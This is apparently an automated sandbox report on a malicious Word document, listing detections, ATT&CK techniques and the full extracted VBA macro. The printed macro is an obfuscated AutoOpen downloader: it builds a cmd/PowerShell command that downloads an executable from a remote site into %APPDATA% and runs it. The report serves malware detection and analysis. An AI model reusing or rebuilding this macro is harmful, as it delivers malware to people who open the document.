MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is a malicious Office document containing a VBA macro. The macro uses obfuscated string concatenation to construct a URL and likely attempts to download and execute a second-stage payload. The presence of the AutoOpen macro and a Shell call further indicates malicious intent.
Heuristics 6
-
ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
lzameffu = Array(yz5 & ifl3 & km & n8 & o & jq & E & ri0 & bfi & f & ow6 & hc0 & oq8 & wn & o0 & nw & orw & uf & n & pm & a0 & a & fp & vsy3 & uj & vy & usx & gb8 & u & ys0 & a4 & zx0 & y1 & pa0 & bo4 & nku & iqb & sji & ss8 & e8 & by & qde3 & dk0 & u4 & x & sa & y & adk & b4 & u6 & ne1 & Acc & utc1 & va & i6 & en8 & i & c1 & ypb & ve & ixp2 & dqu & mt & o5 & ukv & kfe3 & wy & ek3 & u2 & u0 & aw & emh0 & sce8 & zpy2 & d)(0) Shell lzameffu, cmywjaw End If -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() nkesji -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6084 bytes |
SHA-256: acf56ed0ca1c1dda79ecc77378a9246d78aec5c46975c55511daf5792bcd3fc8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nkesji()
hc0 = Array(6966, 5493, 5081, 4201, "np^O", 3775, 916, 4934)(4)
by = Array("OwnL", 7903, 9500, 8650)(0)
x = Array(5624, 4993, 1066, 3039, 9011, "http", 6738)(5)
vsy3 = Array(4976, 2599, 259, "dO^W", 2873, 4238, 6177, 2003, 7601, 2818, 1925, 7575)(3)
bfi = Array(" -ex", 9257, 8985, 1457, 1167, 8884, 3556, 4061, 6859, 2251)(0)
va = Array(3365, 2807, 2747, 1057, 294, 7960, 5784, 6016, 2873, "/upl", 2750)(9)
i = Array(5753, "Aeb7", 1054, 934, 1466, 7529, 2641, 8037, 4300, 2310, 492)(1)
gb8 = Array(2481, 775, 4611, 4562, "IDdE", 875, 4632)(4)
ifl3 = Array("EXE ", 9708, 770, 791)(0)
ukv = Array("xE')", 2927, 2280, 2814, 3993, 6660, 1954, 6399)(0)
wn = Array(8757, 5845, " ", 7832, 8190, 1123, 1637, 3552, 2343)(2)
a4 = Array(7030, 6194, 8356, 1983, 6409, 8517, "^obj", 230, 3040, 1159)(6)
usx = Array(6284, 4040, 3207, 9468, " h", 2967, 8165)(4)
qde3 = Array(6954, 4438, "^oad", 1594, 8959)(2)
vy = Array(3517, "E^ ", 440, 1303, 6291, 4579, 7380, 8195, 2181, 199, 120, 9656)(1)
jq = Array(6528, 6291, 7884, 5649, 6320, 3021, 3324, 8175, "Hel^", 2189, 4127, 201)(8)
sji = Array(1934, 4627, 8467, 1323, 1494, 4569, 5165, 1926, 6006, "C^lI", 4919, 9303)(9)
u6 = Array("y.co", 9714, 858, 7514, 9891, 5874, 8598)(0)
o0 = Array(7530, 5250, 2339, 2578, 7484, "B^Yp", 6015, 5207, 2589, 365, 7036)(5)
u = Array(5726, "n (N", 9325, 4905, 2209, 5610, 8846, 5316, 5078, 1813, 3482, 4797, 2861, 189)(1)
iqb = Array(6102, 3941, 532, 1536, 9754, 7477, 3978, 5986, 9443, ".wEb", 9565, 6694, 8682, 8142)(9)
f = Array(7765, 1009, "E^cU", 9383, 7235)(2)
emh0 = Array(3675, "PPda", 772, 9492)(1)
n = Array(4886, 944, 4606, 510, 6946, "^roF")(5)
utc1 = Array(6653, 1720, "tent", 6876, 5599)(2)
ypb = Array(7619, 423, 5413, 1919, 2633, 5806, 8806, 7286, "BWT9", 1304, 3410, 7868)(8)
ow6 = Array(2124, 6969, "^TiO", 1634, 1110, 8326, 2702, 9895, 1883, 6664)(2)
kfe3 = Array(1555, 6036, 7984, 7165, 4550, 856, 5364, 6778, 7572, 2233, "^;st")(10)
ixp2 = Array(9630, 6181, 7669, "xe',", 7498, 8785, 6093, 3225, 600)(3)
ss8 = Array("^e^N", 9405, 1664, 5583, 6552)(0)
oq8 = Array(8397, 6516, 319, 8293, 8300, 6883, 5047, 2334, 3775, "liCy", 2728, 5105)(9)
u4 = Array(8312, 2726, 2992, 9806, 1685, 8552, 537, 7177, "LE('", 3900)(8)
zpy2 = Array(3613, 848, 8066, "eXe'", 5307, 1449, 245, 7349, 4532, 9401)(3)
e8 = Array("t).d", 9135, 6632, 9689, 459, 8026)(0)
uj = Array(9102, "styl", 6942, 564, 6724)(1)
ne1 = Array(9598, 2240, 3191, 5802, 1377, 9150, 7341, 2673, 3250, "m/wp", 3311)(9)
o5 = Array(5156, 6488, 8098, 9058, 8458, 5710, 8513, "a%.e")(7)
nw = Array("AS^s", 6563, 4107, 2112, 8100, 7560, 4355, 5720, 8399, 4789)(0)
adk = Array(3561, "rsfo", 7252, 7362, 276)(1)
n8 = Array(903, 2026, 186, 611, 2697, "p^OW")(5)
km = Array("/c """, 684, 5121, 1066, 4927, 2289, 8117, 1493, 4016, 436)(0)
i6 = Array(1664, 6804, "oads", 463, 2448, 3867, 9060, 5713, 6575, 1807, 6671)(2)
mt = Array("PDAT", 4480, 9139, 2505, 689)(0)
Acc = Array(811, 5579, 6717, 388, 2582, 5745, 4051, 7692, 7486, 5313, 4826, "-con", 5821, 4912)(11)
dqu = Array(8202, "'%aP", 4253, 2772, 4684, 368, 2259, 8441, 4002, 2069, 7611, 9455, 4413)(1)
dk0 = Array(9673, 6858, 2628, "^F^i", 9723, 8008, 531, 9224, 6659, 5765, 6318)(3)
aw = Array(6821, 2493, 3321, 1085, "^'%a", 8518, 4108, 124, 630)(4)
pm = Array(8381, 6710, 9040, 369, 8946, 4536, "^i^L", 9794, 2920, 6244, 4488, 3684, 6504, 6729)(6)
a0 = Array(5398, "^E ", 7021, 8415, 194, 1786, 7281, 6068, 7269, 2176, 5233)(1)
uf = Array(9525, 3974, 1807, "^nOp", 4693, 863)(3)
E = Array(9345, 5849, 2890, 530, 1910, "L.Ex", 9899, 2198, 2993)(5)
o = Array(1184, 6061, "^Ers", 7108)(2)
b4 = Array(7599, 2024, 6592, "rpla", 8336, 5105, 4856, 6203, 9137, 6059, 1638, 1396, 4100)(3)
zx0 = Array(1641, 6136, 4256, 2353, 9746, 1663, 8575, 2302, 4286, 9875, "eCt ", 6471)(10)
yz5 = Array(9178, 5834, 6693, 5891, "cmd.", 9539, 827, 4343, 7167, 7150, 6566, 1827, 2319, 6907)(4)
cmywjaw = 0
a = Array(" ^-", 5248, 621, 3711)(0)
wy = Array(5297, 6149, "ar^t", 8952, 2547, 4874, 5985, 1354)(2)
ys0 = Array(1501, "E^W-", 7474, 9570, 1486, 8804, 5297, 811, 3709, 7406)(1)
orw = Array(4567, 2854, 6864, 4832, 9791, " -", 8942, 5046, 5623, 6102, 289, 4354)(5)
ri0 = Array("^e ", 6244, 9197, 4361, 9469, 7372, 6450)(0)
u2 = Array(3920, 4620, 3141, 8115, "OceS", 7173, 8339, 4264, 6125, 887)(4)
ve = Array(4940, 9685, 316, "b7.e", 6889, 4858, 572, 6025, 1805, 6481)(3)
c1 = Array(9111, 9731, 7646, 4307, 5210, 1667, 3762, "X/qo", 6950)(7)
ek3 = Array("^-pR", 649, 5271, 2657)(0)
d = Array(1343, 7692, 319, 5767, """")(4)
nku = Array(7795, 2408, "^net", 401)(2)
en8 = Array(609, 7275, 7712, 4717, 9788, "/vel", 5195, 5479, 4021, 9454)(5)
y1 = Array(419, 5020, 3244, 4576, " ", 7273, 2990)(4)
y = Array(6715, 7863, 3821, 9508, "ette", 6112, 9345, 4501, 7078, 2384)(4)
sce8 = Array(1061, 4524, "tA%.", 6397)(2)
u0 = Array(4603, 349, 3024, 5324, 2150, 3574, 595, 4708, 9388, 2545, "s ")(10)
pa0 = Array(7106, 5926, "SySt", 453, 9902)(2)
sa = Array(8127, 6838, 8996, 8823, 247, "://l", 6938)(5)
fp = Array(6641, 9922, 9974, 8109, "w^IN", 5320, 6995, 6524, 5415, 8681, 3806, 1484, 5950, 5882)(4)
bo4 = Array(5912, 7045, 2542, "em^.", 6232, 2065, 5686)(3)
If VarType(ActiveDocument.MailMerge.State) = 3 Then
lzameffu = Array(yz5 & ifl3 & km & n8 & o & jq & E & ri0 & bfi & f & ow6 & hc0 & oq8 & wn & o0 & nw & orw & uf & n & pm & a0 & a & fp & vsy3 & uj & vy & usx & gb8 & u & ys0 & a4 & zx0 & y1 & pa0 & bo4 & nku & iqb & sji & ss8 & e8 & by & qde3 & dk0 & u4 & x & sa & y & adk & b4 & u6 & ne1 & Acc & utc1 & va & i6 & en8 & i & c1 & ypb & ve & ixp2 & dqu & mt & o5 & ukv & kfe3 & wy & ek3 & u2 & u0 & aw & emh0 & sce8 & zpy2 & d)(0)
Shell lzameffu, cmywjaw
End If
End Sub
Sub AutoOpen()
nkesji
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.